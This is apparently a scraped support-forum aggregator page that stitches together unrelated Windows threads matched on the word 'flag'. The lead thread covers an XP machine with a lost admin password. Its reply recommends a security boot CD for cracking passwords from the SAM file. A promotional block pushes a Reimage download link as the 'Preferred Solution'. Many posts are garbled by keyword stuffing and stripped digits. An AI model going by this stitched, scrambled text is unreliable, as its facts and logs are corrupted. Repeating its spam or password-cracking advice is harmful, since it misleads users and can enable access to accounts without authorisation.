Windows Support Forum

Need to set dirty flag - No admin pwd and xp unbootable

Q: Need to set dirty flag - No admin pwd and xp unbootable

Ok firstly I should mention that one solution to this problem would be to plug the HD into my machine and use fsutil to reset the dirty flag However and pwd set unbootable to No dirty Need xp - flag admin I m a stubborn person and know that there must be a way of doing this easily without taking my machine to bits If I do it in what is for this occasion the hard way I will be able to save a little time in the future should the situation arise again I ve been asked to fix an unbootable computer I had intended to boot into the recovery console to issue chkdsk r fixboot and fixmbr commands Unfortunately I the admin password for the installation isn t available it s been forgotten rolleyes and so I can t log into it I used the offline NT password amp registry editor utility but because the drive is flagged dirty improper shutdown no doubt It won t change or blank the password So I got out my trusty NTFS DOS CD and booted into DOS taking a copy of FSUTIL with me which as expected doesn t work under DOS Hoping that the password was something simple ish I grabbed a copy of the SAM and Systemf files from system config and tried cracking the administrator password It seems that the password is at least characters and so will take an age to crack This leaves me with the option of resetting the dirty bit on the volume so that I can reset the admin password to blank boot into the recovery console and repair windows but I see no fsutil equivelant for DOS probably because NTFS was never meant Need to set dirty flag - No admin pwd and xp unbootable for DOS lol It occurs to me though that there must be some utility or other that ll do it or failing that various linux flavours Need to set dirty flag - No admin pwd and xp unbootable have NTFS support and should be able to do it - or possibly some sort of live recovery cd for windows Any ideas anybody All this for the sake of a single BIT of info on the hard drive A simple or It s outrageous lol nbsp Need to set dirty flag - No admin pwd and xp unbootable

Relevancy 100%
Preferred Solution: Need to set dirty flag - No admin pwd and xp unbootable

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/directdownload.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: Need to set dirty flag - No admin pwd and xp unbootable

Auditor Security cd from remote-exploit.org is what you need my friend very handy for cracking admin passwords. just boot to it and you are gold. don't know if you are familiar with this collection cd and if not they have the instruction pdf on the site for download as well. it will crack a 8 letter and asterick password in probably ten to twenty minutes..my admin pass is 15 unprintables and asterick characters and it cracked it with the incremental option on the sam file. took alot longer than it should for your current issue..just an idea mate

http://www.techspot.com/community/topics/need-to-set-dirty-flag-no-admin-pwd-and-xp-unbootable.47274/
Relevancy 43.43%

I hope someone can help me Just this morning i booted up as normal and the always annoying UAC stopped when account admin admin Admin checked! is even being notifications kept Admin account stopped being admin even when admin is checked! popping up I was sure i had disabled these Then i went to use my music software and it said that this account Admin account stopped being admin even when admin is checked! didn't have admin privileges I checked my user account and the check box states that is is an admin account and that UAC is turnd off i only have one account anyways Ive looked on google extensively Tried making new profiles and copy the old one over but that only worked to a certain point - lots of programs didn't work lost mail settings etc Not really workable Tried system restore to no avail Tried using the vista admin account and changing my account - rebooting - etc No change My guess is that something has got Admin account stopped being admin even when admin is checked! corrupt in my user profile and windows is not remembering that i should be an admin I can't use my software and i have a deadline Any one who can help will win a magical prize or something Jen

A:Admin account stopped being admin even when admin is checked!

Welcome
Should be easy, create a New Administrator account and give it permissions to use the software.
User Account - Create
http://www.sevenforums.com/tutorials...rs-groups.html
Procedure for Seven is the Same as For Vista.

http://www.vistax64.com/general-discussion/294399-admin-account-stopped-being-admin-even-when-admin-checked.html
Relevancy 43.43%

Hi,
I have been looking for this answer for 2 days and can not find anyone who has had similair problem.

THere are 2 accounts Administrator and Kenmystro/administrator. I have the password for both and can access both. win 7 Ultimate Hp8510.
I have already selected all user permissions and taken ownership in every box I could find for Kenmystro/admin. the UAC is at minimum and the security centre is off. Run as admin on right click does not help.
It does not matter which of the 2 accounts I log into when I try install certain HP software(Maintenance
& some drivers) it says I do not have admin privileges.

This is driving me nuts can anyone help??

Relevancy 42.57%

I was told by a techy friend of mine that there were somethings in my hijack log that were giving him some red flags, could anyone take a look at them? they might be the cause for so much distress in my computer's speed and unable to pretty much run anything well.
Thanks, Kab.

A:red flag

Hi,Please uninstall the Ask Toolbar since this one is not recommended.Then, * Please download Malwarebytes' Anti-Malware from Here or HereDouble Click mbam-setup.exe to install the application.Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.If an update is found, it will download and install the latest version.In case you already used MBAM previously, please update it before proceeding with the scan. To do this, click the "Update" tab and click the "Check For updates" button.Once the program has loaded and updates were downloaded, select "Perform Quick Scan", then click Scan.The scan may take some time to finish,so please be patient.When the scan is complete, click OK, then Show Results to view the results.Make sure that everything is checked, and click Remove Selected.When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.(See Extra Note)The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.Copy&Paste the entire report in your next reply along with a fresh HijackThis log.Extra Note:If MBAM encounters a file that is difficult to remove,you will be presented with 1 of 2 prompts,click OK to either and let MBAM proceed with the disinfection process,if asked to restart the computer,please do so immediatly.

http://www.bleepingcomputer.com/forums/t/272183/red-flag/
Relevancy 42.14%

I used to have this awesome little piece of software on my computer It added an option to the context menu that said I can't remember EXACTLY what it said and my Google searches haven't been close enough to give me what I want something about quot flag as quot or quot add flag quot or quot flag for follow-up quot or something along those lines and then gave you a choice of five to seven different colored flag icons You could select one and whatever file or folder you chose to quot flag quot would Add to folders.... a flag XP then have a small colored flag overlaid upon it similar to how shortcuts get the arrow overlay and shared folders get the hand overlay Long story short I don't remember the name of this piece of software Nor where I found it No names or screen-shots or anything else that has led me to find it again And the hard drive that it was on has been formatted and a new OS installed on it Add a flag to XP folders.... I'm hoping that someone in this community read my description which is pretty much quot Oooo pretty flags Colors and know exactly what I'm talking about And of course it would be great if the person with that knowledge was kind enough to share the name of the software with me

A:Add a flag to XP folders....

I don't know if it is the same but you can try MyFolder from here
http://www.download3000.com/download_18422.html

http://www.techsupportforum.com/forums/f10/add-a-flag-to-xp-folders-509107.html
Relevancy 42.14%

when i restart computer sometimes as its shutting down the red X pops up with a "dll.file" issue but continues to reboot... any clue why??? the file, or red X pop up as i call it does not stay up long enough for me to read the whole file...

A:Red Flag File

Nope, no idea - we'll need more info on the error in order to troubleshoot it.

http://www.bleepingcomputer.com/forums/t/92342/red-flag-file/
Relevancy 42.14%

I'm running XP Home w/SP2. When I put the pointing finger on a link, a small flag pops up telling me, usually, what I already know. After all this time it's become annoying! In some cases the flag is actually covering info that I'm trying to read. I've tried every setting I can think of, but nothing gets rid of the flags. Can I get rid of these? If so, how?

A:Flag Elimination

Where exactly are these popup flags appearing? There's several causes of them (java for the web based stuff, windows for the desktop stuff, and other sources for the rest).

http://www.bleepingcomputer.com/forums/t/40524/flag-elimination/
Relevancy 42.14%

Can anyone tell me if there's a program which will help me make an animated gif of a flag? I know there are lots of ready-made flag animations around, but it's not as easy as just grabbing one and changing the colours! Ideally, I'd like to be able to draw my flag, then have the program animate it for me. Is there such a program? Many thanks.

Relevancy 42.14%

I've been noticing the flag in the upper right corner of my brower and outlook express, i've noticed that its been there, but just this morning i've notice that sometime its not waving and other times it is. does it represent anything?

A:Microsoft Flag

I think that the flag represents activity, when waving and non-activity not waving.

https://forums.techguy.org/threads/microsoft-flag.437148/
Relevancy 42.14%

Access In essence I need to click a button that will quot mark quot a members records so that when the records are accessed a warning in either form or message box format will pop up I have chosen the members SSN which is a field on the main form to act as the trigger What I imagine is a button that when pressed copies the SSN on quot MAIN quot form to a permanent table in the background Let s call the the separate table quot tbl FlagCheckPoint quot and the field ChalSSN Then when a record is accessed the SSN on quot MAIN quot is filtered for on quot tbl FlagCheckPoint quot - if NO match - do nothing - if it finds a match the warning pops up I would greatly appreciate any info on how to achieve this and if anyone has a more elegant method to achieve this those suggestions are welcomed too If my idea is the appropriate method I need help with the code for the button to copy to the separate table and also need help with how to make a freshly loaded record skim through the second table for SSN match Thank you nbsp

https://forums.techguy.org/threads/flag-records.1158833/
Relevancy 42.14%

Is there any way to add a "St. Vincent and the Grenadines" flag to those available in setting up profiles?

David

http://www.vistax64.com/general-discussion/207775-country-flag.html
Relevancy 42.14%

Is there anyway to make a texas flag in command prompt as your prompt? using the prompt $ stuff?

http://www.techsupportforum.com/forums/f10/cmd-texas-flag-418815.html
Relevancy 41.71%

We are at a Charter Internet provided RV park and the internet requires a password that is accessed through the 'additional log on' pop up and/or opening browser that should then open the sign-on...neither is now happening on my 64 bit Windows 7 Home Premium Toshiba laptop. The wireless will sign on to the system and then it will show no internet access but after a short period that warning goes away and it says internet access...but I cannot access the internet. For the first couple weeks that we were here, I was getting the pop-up and clicking it opened my browser and the sign up sheet appeared...than it just stopped. I have gone in an checked the active search registry is at '1' the way it should be...I have flushed the dns and run all my anti-virus and anti-spy ware programs...and nothing changes...I cannot get to the net...HELP!

Greg

A:Cannot get 'additional log on required' flag

What happens if you just start your browser?

http://www.sevenforums.com/general-discussion/375883-cannot-get-additional-log-required-flag.html
Relevancy 41.71%

it's off

A:action center flag

Hello Byada, and welcome to Seven Forums.

You might see you may be able to enable it again using the tutorial below.

System Icons - Enable or Disable

Hope this helps,
Shawn

http://www.sevenforums.com/general-discussion/221322-action-center-flag.html
Relevancy 41.71%

Hi I just got this computer a week ago and none of the other programs I to what aswMBR in do? Red IRP_MJ_CREATE... flag have seem to find anything but in aswMBR it finds this Driver iaStorA xfffffa ee - gt IRP MJ CREATE - gt xfffffa c c Is it a malware Red flag in aswMBR IRP_MJ_CREATE... what to do? Should I click fix mbr I'm not sure what program to use to remove this I've tried to scan with Mbam Hitmanpro Avast Red flag in aswMBR IRP_MJ_CREATE... what to do? but none of them seem to find anything I also scanned with tdsskiller and it found PUPs on a deep reboot scan but I think were from the start menu hijack I installed so I could get a start menu like win Could this have had malware Not sure what to do next to remove or check further Thanks aswMBR log aswMBR version Copyright copy AVAST Software Run date - - ----------------------------- OS Version Windows x Number of processors x A ComputerName WINTERMUTE UserName Zero-One Initialze error AVAST engine defs Disk boot Device Harddisk DR - gt Device d Disk Vendor SAMSUNG MZMTD HAFV- L DXT L Q Size MB BusType Disk MBR read successfully Disk MBR scan Disk unknown MBR code Disk Partition EE GPT MB offset Disk scanning C windows system drivers Service scanning Modules scanning Disk trace - called modules ntoskrnl exe CLASSPNP SYS disk sys gt gt UNKNOWN xfffffa c e c lt lt sptd sys storport sys hal dll iaStorA sys nt IofCallDriver - gt Device Harddisk DR xfffffa CLASSPNP SYS fffff be a - gt nt IofCallDriver - gt Device d xfffffa ee Driver iaStorA xfffffa eebe - gt IRP MJ CREATE - gt xfffffa c e c AVAST engine scan C windows AVAST engine scan C windows system AVAST engine scan C windows system drivers AVAST engine scan C Users Zero-One AVAST engine scan C ProgramData Scan finished successfully Disk MBR has been saved successfully to C Users Zero-One Documents MBR dat The log file has been saved successfully to C Users Zero-One Documents aswMBR txt

A:Red flag in aswMBR IRP_MJ_CREATE... what to do?

Hi and Welcome!!   

My name is Jeff. I would be more than happy to take a look at your malware results logs and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:
The fixes are specific to your problem and should only be used for the issues on this machine.
It's often worth reading through these instructions and printing them for ease of reference.
If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
Please reply to this thread. Do not start a new topic.
If you happen to have a flash drive/thumb drive please have that ready in the event that we need to use it.
Please be sure to subscribe to the topic if you have not already done so.
IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your operating system and losing all your programs and data.

Having said that....     Let's get going!!  
----------
 Are you using any type of CD Emulation programs by chance?
----------------------------

Please download DDS from either of these links
 LINK 1LINK 2

and save it to your desktop.
Disable any antivirus programs during the scan (If you have difficulty properly disabling your protective programs, refer to this link here )
Double click dds to run the tool.
When done, two DDS.txt's will open.
Save both reports to your desktop.
---------------------------------------------------Please include the contents of the following in your next reply:
 DDS.txt
 Attach.txt
----------
 AdwCleaner

Please download AdwCleaner by Xplode and save to your Desktop.
Double click on AdwCleaner.exe to run the toolVista/Windows 7/8 users right-click and select Run As Administrator.
Click on the Scan button.
AdwCleaner will begin...be patient as the scan may take some time to complete.
After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
Copy and paste the contents of that logfile in your next reply.
A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.
----------

http://www.bleepingcomputer.com/forums/t/509270/red-flag-in-aswmbr-irp-mj-create-what-to-do/
Relevancy 41.71%

Hey,

A recent snafu left me to discover I had deleted 120GB worth of files. I unplugged the drive right away, however undelete programs tend to do a less than adequate job (for exmaple, for some reason files are intact, but the wrong filename attached, etc).

This is an NTFS drive. Is there any program out there that will simply change the appropriate flag in the MFT to indicate the file has not erased? Wit the fact the drive was removed immediately, this would be the best option given such am application existed.

I am a user of Windows, BSD and Linux so I'm not bound to one OS in fixing this problem. I have Googled, but have not gotten the results I would like.

TIA

https://forums.techguy.org/threads/changing-the-deleted-flag.864719/
Relevancy 41.71%

I ran SuperAntiSpyware, which is a program I don't usually utilize, to see if it would detect anything that MalwareBytes and Emsisoft Emergency Kit had not detected on my wife's computer that is running unusually slow. I am not a novice at virus/malware removal or other computer issues. The issue with her computer seems to be malware related. SuperAntiSpyware identified the following as a Trojan.Agent/Gen-Autorun [swisyn]. C:\Program Files\TestOut\sims\ap06\programs\ certsrv.exe Can anyone verify or discount this identification? I know the there is a certsrv.exe that is a normal Windows service. Thanks.

A:Is this a false flag by SuperAntiSpyware?

Hello -
Chances are that it is a False Positive. Do you use Avast as your Antivirus, as this was reported at their forum ??

Download TFC (Temp File Cleaner) by OldTimer to your desktop
 • Close any open windows.
• Double click the TFC icon to run the program
• TFC will close all open programs itself in order to run,
• Click the Start button to begin the process.
• Allow TFC to run uninterrupted.
• The program should not take long to finish it's job
• Once its finished it may automatically reboot your machine,
• if it doesn't, please manually reboot to ensure a complete clean

Check again after that.
For this reason SAS seems to have dropped a bit in rankings recently.

I would rely on the latest version of Malwarebytes Anti-Malware Free more often.

http://www.bleepingcomputer.com/forums/t/534785/is-this-a-false-flag-by-superantispyware/
Relevancy 41.71%

Ok. So I was fooling around and added a language to my keyboard. Now when I type in search bars, and even as I input text now, The cursor (blinking line) looks like it has a little triangle on the top right of it. I know this must be easy to fix, and I have since removed the second language, but that did not make a difference.

Again, all I have done is added and removed a second language and now the problem persists.

It's not even my computer so I need help please!

A:Insertion cursor looks like it has a flag

Oops. didnt mean to post.

But I did just notice I can still switch between languages even though I removed the new one. I dont understand this.

http://www.bleepingcomputer.com/forums/t/462247/insertion-cursor-looks-like-it-has-a-flag/
Relevancy 41.71%

I am trying to install a few programs on a fresh RC x64 build but each one reports that Windows requires a restart, including the 7127 build install of Windows.

I have restarted a bunch of times since first seeing this but the flag isn't cleared.

Any ideas how to make Windows think it's ready to install again?

Cheers

A:Restart flag is stuck on

Not to worry - I had a feeling Nero was the culprit and immediately after uninstalled it I was able to move on with life. The error text I was getting was -

Windows needs to be restarted so necessary changes to system files can be made before continuing.

Nero was v8.

http://www.sevenforums.com/software/10690-restart-flag-stuck.html
Relevancy 41.71%

Hello,
I have four partitions on my HDD with Windows 7 on the second one. I want the boot flag ( Boot flag - Wikipedia, the free encyclopedia ) on the first partition and only on it. It contains a menu, that gives me a choice of what OS to boot. Whenever I boot Windows 7 from the second partition, it resets the boot flag to the second partition only and thus I can't get back.

How do I tell Windows 7 not to do this?
Alternatively, is there a way to reset it manually from within Windows 7 so I don't have to boot a rescue CD?

(looking forward to UEFI, when the rescue CDs won't boot...)

A:W7 resets bootable flag on HDD

Welcome to Windows Seven Forums.

It will help us to help you if you post a screenshot of your fully-expanded disk management layout.

Screenshots and Files - Upload and Post in Seven Forums

This tutorial may solve your problem.

Bootrec.exe Tool - How to Use in Windows Recovery Environment

http://www.sevenforums.com/hardware-devices/198106-w7-resets-bootable-flag-hdd.html
Relevancy 41.71%

Does anyone know how to permanently disable that pesty "pop up flag" that constantly appears from the Windows XP task bar telling me my wireless connection speed ?

Relevancy 41.71%

HijackThis threw an F2 flag after I was cleaning my W7 laptop. I restored what was removed but it didn't help so I upgraded to W7 Pro. Still no change. Would like to find the error I made so I don't do it again.

Thank you for your help, ElieY

A:HijackThis threw a F2 flag. Need help

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Please download ComboFix from any of the links below, and save it to your desktop. For information regarding this download, please visit this web page: http://www.bleepingcomputer.com/combofix/how-to-use-combofixLink 1Link 2* IMPORTANT !!! Save ComboFix.exe to your DesktopIMPORTANT....1. Close any open browsers.2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.3. Do not install any other programs until this if fixed.How to : Disable Anti-virus and Firewall...http://www.bleepingcomputer.com/forums/topic114351.htmlDouble click on ComboFix.exe & follow the prompts. When finished, it will produce a report for you. Please post the C:\ComboFix.txt Note:Do not mouse click ComboFix's window while it's running. That may cause it to stallNote: If you have difficulty properly disabling your protective programs, refer to this link --> http://www.bleepingcomputer.com/forums/topic114351.htmlNote: If after running ComboFix you get this error message "Illegal operation attempted on a registry key that has been marked for deletion." when attempting to run a program all you need to do is restart the computer to reset the registry.===Third party programs if not up to date can be the cause infiltration of an infection.Please run this security check for my review.Download Security Check by screen317 from here.Save it to your Desktop.Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.A Notepad document should open automatically called checkup.txt; please post the contents of that document.===Please download AdwCleaner by Xplode onto your Desktop.Double click on AdwCleaner.exe to run the tool.Click on Search.A log file will automatically open after the scan has finished.Please post the content of that log file with your next answer.You can find the log file at C:\AdwCleaner[Rn].txt (n is a number).Please post the logs for my review.

http://www.bleepingcomputer.com/forums/t/479568/hijackthis-threw-a-f2-flag-need-help/
Relevancy 41.71%

i'm reasonably familiar with the menu that allows you to distort a text layer....and i could also fool around with tranforming it, as well.....(haven't as yet...my day is crunched, so i thought i'd take one of the moments i have and ask here)

but i'm curious whether there are any other options...seems on a blank flag-in-a-breeze, with hightones and lowtones and midtones, somebody might have figured out a way to "lay" text over it to reflect the contours of the surface

anyone here have any experience with this?

A:photoshop text on a flag

Really old tutorial, but it will give you a place to start.

http://graphicssoft.about.com/library/uc/ucrb_flagpast1.htm

https://forums.techguy.org/threads/photoshop-text-on-a-flag.439961/
Relevancy 41.28%

Hi. How come the reminder for a 'Flag for Follow Up' does not always work? Sometimes a reminder pops up. But, sometimes it does not. I never set a past due reminder. What's happening?

Relevancy 41.28%

I am using a flag search in my program and I am having a problem with the output After the Flag output Search and problem user inputs which number they want to search for I have a message box popping up to tell them at what positions in the array the number was found at Ex Array holds Flag Search and output problem Search for output quot the number was found at positions quot Right now all I can get it to do is output quot the number was found at position quot How can I make it so that it shows all of the positions that the instance is found at Below is the code I have so far Code Dim x flag y As Integer Dim i As Integer Dim str As String flag x TextBox Text For i To y UI i If y Flag Search and output problem x Then flag End If Next If flag Then str CStr x amp quot quot MsgBox quot Search String found at quot amp str ElseIf flag Then MsgBox quot Search String not found quot End If nbsp

A:Flag Search and output problem

What language is this, and what's the application? I don't mean to sound rude, but what you're trying to do is pretty useless except in advanced procedures.

chris.

https://forums.techguy.org/threads/flag-search-and-output-problem.464565/
Relevancy 41.28%

Hello all-

I have a user ( a secretary) who also has her bosses mailbox set up in her Outlook 2003. When she makes changes or moves e-mails to different folders within his box, it replicates over to his side. They want to use flag colors so that her boss can designate which e-mails he wants her to handle. The problem is if he or she changes a flag color on their program, it does not replicate over to the other. Is there a way to fix this setting so that if someone flags an e-mail red, it will change on the other users mail as well?

https://forums.techguy.org/threads/using-flag-colors-in-outlook-2003.490635/
Relevancy 41.28%

I was trying to help someone here and asked them to post a screen capture of a full screen Disk Management window as I've done many times before. He said none were marked as Active.

I opened Disk Management (full screen) on my Windows 8.1.1 Pro X64 EFI/GPT system so I could post a screen capture showing him where it would show up.

I was very surprised when there was no Active flag shown anywhere. I know it used to show up.

What happened and when did this change occur. Must have been a Windows Update that screwed it up.

It's still there under Windows 7 on a different computer (BIOS/MBR):

A:Where did the Active flag go in Disk Management?

Active partition is set only for MBR style installation. For UEFI installation, it is managed by the BIOS thru Windows Boot Manager. You can't even set a disk Active with GPT disk.

http://www.eightforums.com/general-support/52533-where-did-active-flag-go-disk-management.html
Relevancy 41.28%

Hi,
Has anyone else had this problem? Lately, in Outlook Express I have noticed the flag icon has disappeared and now I cannot find out how to find it again to flag any messages. I click on the drop down menu to flag message, but no flag shows up beside the message, so where has it gone and how do I restore it? It is useful to have this flag, and I really need it back. Plesase help!

http://www.techspot.com/community/topics/outlook-express-flag-disappeared.73198/
Relevancy 41.28%

Hi,
Has anyone else had this problem? Lately, in Outlook Express I have noticed the flag icon has disappeared and now I cannot find out how to find it again to flag any messages. I click on the drop down menu to flag message, but no flag shows up beside the message, so where has it gone and how do I restore it? It is useful to have this flag, and I really need it back. Plesase help!

http://www.techspot.com/community/topics/outlook-express-flag-disappeared.73198/
Relevancy 41.28%

Ok , as the title says ,the flag disappears particularly if explorer restarts .i have it set to show icons and notifications ,the funny thing is it does the same on the laptop(currently using desktop)
occasionally i can get it back by opening Godmode folder but this is a nuisance and not always successful. on the laptop last night i performed a system restore to a point when it was ok ,it didnt work also ran sfc/scannow ,the flag came back but on reboot it was gone again.
any ideas folks?

A:Action center flag disappears

What is causing explorer to restart?

http://www.sevenforums.com/general-discussion/175106-action-center-flag-disappears.html
Relevancy 41.28%

I'm trying to reformat an SD that I used for a Raspberry Pi but the main partition has a boot flag. Windows thinks the user is an idiot so I can't delete that partition so I can join it up with the other 14.81GB. I do not want to shutdown and boot into GParted just for this one thing- that's silly.

A:How do I remove a boot flag from a device?

Use diskpart from the command line and use "clean" after selecting the drive. Be sure to select the correct drive before using clean!

http://www.sevenforums.com/performance-maintenance/278498-how-do-i-remove-boot-flag-device.html
Relevancy 41.28%

Not sure if this belongs here or Event Viewer Flag Vista Red in the hardware section but I m sure you guys know best and will Vista Event Viewer Red Flag move it if necessary I thought the Vista section only because I triple boot x XP Pro and Vista Ultimate and this is only happening in Vista Under the Application tab a type error for my Microsoft Lifecam VX Faulting application LifeTray exe version time stamp x e faulting module kernel dll version time stamp x bd exception code xe d fault offset x b e process id x application start time x c b cd ee This just happens once at every boot I have the latest drivers installed from Microsoft The only strange behavior of late and this occurs in all systems is that my cam comes to life the light glows at every boot and stays on unless I open the application then close it again It never used to do that until wait for it and laugh I installed an ATI TV Wonder Pro card and associated drivers Plus occasionally lifetray exe fails to start in only one of my XP s but only occasionally error report sent to Microsoft What on Earth the TV card has to do with Lifecam is beyond me but I ve seen so many strange things in my long years that nothing amazes me any more Any ideas regarding the Event Viewer error Reinstall the software perhaps nbsp

https://forums.techguy.org/threads/vista-event-viewer-red-flag.587504/
Relevancy 41.28%

I've noticed in my experience with replying to emails, that the flag status that indicates the email was replied to (the pink arrow pointing to the right), does not show consistently. Sometimes it displays and sometimes it does not. Has anyone experienced this? Does anyone know how to resolve this?

A:Outlook - Flag Status Inconsistency

>>Has anyone experienced this?

Yep.

>>Does anyone know how to resolve this?

Nope.

Sorry. I don't care enough for me. But you might want to look at:

http://support.microsoft.com/default.aspx?scid=kb;en-us;195980&Product=out2K

Or this, if you're using OL at work:

http://support.microsoft.com/default.aspx?scid=kb;en-us;220042&Product=out2K

https://forums.techguy.org/threads/outlook-flag-status-inconsistency.201100/
Relevancy 41.28%

I can't seem to move the "Flag" column from the far right to the far left. I've tried to follow the outlook help and the "Flag" column is the only one that won't move.

Any Ideas?

TIA

A:Office 2003 Flag Question

http://www.middlebury.edu/NR/rdonly...AAD2822C1375/0/MoveFlagStatusColumnOL2003.pdf

https://forums.techguy.org/threads/office-2003-flag-question.575629/
Relevancy 41.28%

Hi, does anyone know how to change XP flag image which is shown at the picture below (next to the red arrows):

I want that image back to the default XP flag image, but don't know how to do that.
I think it's related to the registry, but I don't know which registry key that handles that XP flag image.

Anyone know how to change that image back to default XP flag image?
Thanks in advance.

Kev.

Relevancy 41.28%

Last night some one with a very strong accent called, addressing me by name,  saying he had been contracted to contact people and warn them of a serious problem that affecting many computers.  He wanted me to press my windows flag key and the "r" key at the same time.  Stupid me did, but then became suspicious and hung up on him.  He never called back, and I turned my computer off.  Did I give him access to something?  What do I need to do?

Solved!
View Solution.

A:what, if anyting, does pressing the windows flag key and the...

I'm sure that was a scam call, but you hung up before they could do anything malicious to your computer. Pressing the Windows key + R just brings up the "Run" screen. It is completely harmless to bring up "Run," but if you had continued to follow all the steps this guy was about to give you, he probably would have tried to gain remote access to your computer or load a virus or some other awfulness. I'm glad you hung up on him!

http://h30434.www3.hp.com/t5/Desktop-Operating-Systems-and-Recovery/what-if-anyting-does-pressing-the-windows-flag-key-and-the/td-p/1848837
Relevancy 41.28%

I have a query that brings back new orders. I have a customer column that we watch to see if there are any duplicates. I would like to add another column to this query that looks at the customer column and if there is a duplicate entry it put "DUPLICATE" in the new column rows.

Is this possible? I've tried to use DCount but either it does not work or I used it wrong......

Relevancy 41.28%

Why there is no cross-mark on this notification flag?
i daily use pc, always it shows red cross-mark, but today didnt show cross-mark.
Is windows 7 detected my windows not genuine?

A:Why there is no cross-mark on this notification flag?

Lets take a basic look at things. Maybe it will help.

Complete this tutorial and post the results here.

Windows Genuine and Activation Issue Posting Instructions

http://www.sevenforums.com/general-discussion/368398-why-there-no-cross-mark-notification-flag.html
Relevancy 41.28%

what are the actual colors besides(blue, green,red and yellow) . What shade of of these colors? John

A:Actual colors of Windows 7 flag

Hope this helps.

The Four Colors of the New Microsoft Company Logo - Your Software Has Bugs - Site Home - MSDN Blogs

http://www.sevenforums.com/general-discussion/361490-actual-colors-windows-7-flag.html
Relevancy 41.28%

As of today, out of nowhere at random times, an image of a small flag will pop up on my computer, always as a different file name. Here is a photo:I checked the properties, and it came up in the Temp folder. I delete them, but it keeps coming back with a different file name...Not sure if its a related issue or not, but as of today there have been a lot of "mevio" related web links on my history that I have not been on...Anyone have any idea what this is?

A:Small flag image keeps popping up

Their is a good chance you are infected. I recommend going to Am I infected? What do I do?on this site. Their will be instructions what to do.

http://www.bleepingcomputer.com/forums/t/419165/small-flag-image-keeps-popping-up/
Relevancy 41.28%

Hi - is it possible to add a flag (or whatever it might be called) to an .exe or the command-line to stop to stop a specific .dll from loading when an app is launched?

I am not even sure I am asking the question in the right manner, but I am trying my best!

A:Flag added to stop a .dll from loading?

be more specific...what .exe, what .dll, and if the program calls for the .dll, it prob won't run without it....

http://www.sevenforums.com/general-discussion/183770-flag-added-stop-dll-loading.html
Relevancy 41.28%

Hi!

I've got a problem when trying to see the downloaded files from my Boxee on my already shared folder it can't see the files in the new folder untill i set the r flag.

Why doesn't the folders inherits the r flag? Or why must i set it manually?

Can i change this behavior somewhere? Please it driving me crazy.

ToddeSwe

http://www.eightforums.com/network-sharing/25508-why-doesnt-sub-folders-inherits-r-flag.html
Relevancy 41.28%

Hi,
I need Action Center flag appear only when an issue arises (like a WIndows update is needed). At other times, when "No current issues detected" I need the flag to disappear (but not hide !, because I don't need any hidden items on my task bar). I can't turn the flag off altogether, because I need to be notified of Windows updates and other stuff. In other words, the flag should behave like a yellow update shield in WinXP, which appeared only to notify about an update. Is it possible in Win 8.1 or is this asking too much?

http://www.eightforums.com/customization/55500-action-center-flag-behavior.html
Relevancy 41.28%

Ive tried eveything I can think raising my white Vundo. to flag! Tried it own, do the on of to get rid of the Vundo infection Vundo. Tried to do it on my own, raising the white flag! on my Vundo. Tried to do it on my own, raising the white flag! sister in laws computer Here is the HijackThis log from her computer Logfile of Trend Micro HijackThis v Scan saved at PM on Platform Windows XP SP WinNT MSIE Internet Explorer v Boot mode Normal Running processes C WINDOWS Vundo. Tried to do it on my own, raising the white flag! System smss exe C WINDOWS system winlogon exe C WINDOWS system services exe C WINDOWS system lsass exe C WINDOWS system svchost exe C WINDOWS System svchost exe C WINDOWS Explorer EXE C WINDOWS system spoolsv exe C Program Files iTunes iTunesHelper exe C WINDOWS System spool DRIVERS W X EKIJ MUI exe C Program Files LogMeIn x LogMeInSystray exe C Program Files Trend Micro Internet Security UfSeAgnt exe C Program Files LogMeIn x LMIGuardian exe C Program Files Common Files Apple Mobile Device Support bin AppleMobileDeviceService exe C Program Files Bonjour mDNSResponder exe C Program Files LogMeIn x RaMaint exe C Program Files LogMeIn x LogMeIn exe C Program Files LogMeIn x LMIGuardian exe C Program Files Trend Micro Internet Security SfCtlCom exe C WINDOWS System svchost exe C Program Files Viewpoint Common ViewpointService exe C WINDOWS system SearchIndexer exe C WINDOWS System wwSecure exe C Program Files Raxco PerfectDisk PDSched exe C Program Files Canon CAL CALMAIN exe C Program Files iPod bin iPodService exe C Program Files Trend Micro Internet Security TmProxy exe C Program Files Viewpoint Viewpoint Manager ViewMgr exe C Program Files Trend Micro BM TMBMSRV exe C WINDOWS system wuauclt exe C Program Files LogMeIn x LogMeIn exe C Program Files Trend Micro HijackThis HijackThis exe C WINDOWS system NOTEPAD EXE R - HKCU Software Microsoft Internet Explorer Main Start Page http www yahoo com R - HKLM Software Microsoft Internet Explorer Main Default Page URL http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Default Search URL http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Search Page http go microsoft com fwlink LinkId R - HKLM Software Microsoft Internet Explorer Main Start Page http go microsoft com fwlink LinkId R - HKCU Software Microsoft Internet Connection Wizard ShellNext http windowsupdate microsoft com R - HKCU Software Microsoft Windows CurrentVersion Internet Settings ProxyOverride local O - BHO QFX Software KeyScrambler - B F - A - - E -C B BC E - C Program Files KeyScrambler 